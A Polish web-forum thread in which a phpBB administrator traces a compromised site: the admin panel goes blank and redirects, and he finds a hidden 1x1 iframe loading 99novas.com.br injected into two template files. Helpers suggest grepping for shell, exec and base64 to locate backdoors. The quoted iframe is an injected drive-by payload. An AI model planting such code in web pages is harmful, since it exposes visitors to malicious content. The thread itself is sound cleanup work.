Nie działa PA - podmienione coś w kodzie strony |
Autor |
Wiadomość |
The End
Posty: 49
|
Wysłany: 13-04-2015, 20:23 Nie działa PA - podmienione coś w kodzie strony
|
|
|
Witam,
Panowie gdzie/ w jakich plikach szukać "lewych" kodów w plikach na FTP, bo jak próbuję się logować do PA to nie ładuje się strona tj. ładuje się tylko pusta strona - białe tło.
Jest też taka ciekawostka, że podczas próby logowania do PA przez sekundę pojawia się w pasku adres: 99novas.com.br
Przeszukałem pliki index ale tam nic nie ma |
|
|
|
|
Gadatliwa Kasia
|
|
|
|
Tommekk80
Pomógł: 1411 razy Posty: 4780
|
Wysłany: 13-04-2015, 20:26
|
|
|
The End, sprawdź overall_header i footer oraz bannery w stopce/nagłówku. Jak nie możesz przez PA to w bazie, tabela config. |
|
|
|
|
The End
Posty: 49
|
Wysłany: 14-04-2015, 13:57
|
|
|
Witam, niestety nic w tych plikach nie ma... Gdzie to może jeszcze być? |
|
|
|
|
irekk
Pomógł: 283 razy Posty: 2927
|
|
|
|
|
The End
Posty: 49
|
Wysłany: 14-04-2015, 21:07
|
|
|
Witam,
Tak wertując pliki w katalogu forum znalazłemi iframe:
Kod: | <iframe src="http://99novas.com.br/amf/index.php?out=1417096020" width="1" height="1" frameborder="0"> |
W pliku: page_header.tpl
Ale po usunięciu tego iframe nadal jest coś nie tak, bo dalej widzę przekierowanie na pustą stronę.
Dodano:
kolejny plik z iframe to: index_frameset.tpl |
Ostatnio zmieniony przez The End 16-04-2015, 20:55, w całości zmieniany 1 raz |
|
|
|
|
irekk
Pomógł: 283 razy Posty: 2927
|
Wysłany: 14-04-2015, 21:18
|
|
|
Wyszukaj czy na serwerze nie masz plików zawierających fraz shell, exec, base64. Z reguły tak się ukrywa skrypty dające możliwość zdalnego przejęcia serwisu. Ewentualnie poproś administratora. Możesz ewentualnie wgrać wszystko na świeżo. |
_________________ Cygantura |
|
|
|
|
The End
Posty: 49
|
Wysłany: 14-04-2015, 21:31
|
|
|
Udało mi się uruchomić PA po usunięciu tego ostatniego iframe.
Na razie wszystko działa jak należy.
Poszukam plików, nie wiem skąd te ataki i pliki o których wspominasz, gdzie ich szukać? |
|
|
|
|
irekk
Pomógł: 283 razy Posty: 2927
|
Wysłany: 14-04-2015, 22:15
|
|
|
Na serwerze trzeba puścić grepa, ewentualnie może w cpanelu/plesku/czy co tam masz, jest opcja wyszukania plików po treści. |
_________________ Cygantura |
|
|
|
|
Gadatliwa Kasia
|
|
|
|
The End
Posty: 49
|
Wysłany: 14-04-2015, 22:18
|
|
|
Ok, dziękuje. Dam znać adminowi serwera, bo ja administruję tylko to forum. |
|
|
|
|
|